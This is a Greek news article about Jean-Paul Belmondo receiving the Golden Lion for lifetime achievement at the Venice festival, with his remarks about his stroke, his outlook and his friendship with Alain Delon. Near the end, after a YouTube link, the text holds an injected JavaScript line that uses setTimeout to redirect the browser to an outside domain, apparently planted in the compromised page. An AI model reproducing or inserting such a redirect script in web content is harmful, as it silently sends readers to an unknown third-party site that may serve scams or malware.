Τιμήθηκε στη Βενετία ο θρυλικός «γοητευτικός άσχημος» του κινηματογράφου (BINTEO)

0
75

 

Από τα χέρια της επίσης Γαλλίδας σταρ Σοφί Μαρσό παρέλαβε τον Χρυσό Λέοντα για την Προσφορά του στον Κινηματογράφο, ο θρυλικός γοητευτικός άσχημος του παγκόσμιου κινηματογράφου, Γάλλος Ζαν Πολ Μπελμοντό.

Ο 83χρονος σταρ του γαλλικού κινηματογράφου αντιμετωπίζει κινητικά προβλήματα και χρησιμοποιεί μπαστούνι για να τον υποβοηθά. Ανέβηκε στη σκηνή και παρέλαβε το βραβείο του με ένα πλατύ χαμόγελο, που στο παρελθόν τρέλαινε όλες τις γυναίκες του πλανήτη. Το κοινό σηκώθηκε όρθιο χειροκροτώντας ασταμάτητα τον Μπελμοντό σε μία συγκινητική απονομή.

Ο Μπελμοντό που εξέφρασε το νέο κύμα του γαλλικού κινηματογράφου, συνεργάστηκε με τους σπουδαιότερους δημιουργούς και ερμήνευσε ρόλους που τον καθέρωσαν ως έναν από τους εικονικούς αντιήρωες, σαγηνευτικός και προκλητικός και σίγουρα πολύ διαφορετικός από τα στερεότυπα του Χόλιγουντ.

«Ποτέ δεν σκέφτομαι τo παρελθόν. Μπροστά, μπροστά, μπροστά» είπε ο 83χρονος σουπερστάρ της μεγάλης οθόνης.

Ο Μπελμοντό υπέστη βαρύ εγκεφαλικό το 2001 με αποτέλεσμα να έχει κινητικό πρόβλημα ενώ με δυσκολία ανέπνεε για να φθάσει στη σκηνή για τη συνέντευξη Τύπου. Ωστόσο, δήλωσε «πολύ πολύ χαρούμενος να τιμώμαι εδώ στη Βενετία».

https://www.youtube.com/watch?v=MgYJEc3SH3Y

«Είμαι φίλος καρδιακός με τον Αλέν Ντελόν» είπε για την υποτιθέμενη κόντρα με τον πανέμορφο και γοητευτικό Γάλλο συνάδελφό του. «Κι όταν είσαι καρδιακός φίλος είναι για μια ζωή» σημείωσε.

«Τα έζησα όλα στη ζωή μου, είναι σαν να αναμιγνυέις τα πάντα, μια κλαις και μια γελάς» επεσήμανε.

https://youtu.be/kIpmjpUqa4M setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here